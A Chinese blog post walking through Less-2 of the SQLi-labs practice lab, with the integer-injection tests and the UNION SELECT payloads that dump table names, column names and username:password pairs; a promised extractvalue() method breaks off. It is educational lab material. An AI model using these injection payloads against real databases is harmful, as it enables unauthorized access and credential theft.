漫漫SQL lab学习路 less-2篇

在具备less 1的基础后,深入理解SQL注入漏洞。通过?id=1'、1=1及1=2的测试,确认为整数型注入。文章介绍如何爆表名、列名和值,特别探讨了利用extractvalue()函数进行WP的另一种方法,强调了extractvalue()函数的查询限制和substring()的使用场景。
摘要由CSDN通过智能技术生成

less 2:
有了less 1 的基础,我们就直接进入正题
输入?id=1’ 报错
输入?id=1 and 1=1正常显示
输入?id=1 and 1=2 报错
说明这是一个整数型的注入漏洞
有了less 1的铺垫我们就不用order by猜列数了
爆表名:

1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述
接着爆列名

1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

在这里插入图片描述
爆值

1 and 1=2 union select 1,2,group_concat(username,0x3a,password) from users

在这里插入图片描述

另外一种wp:<

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值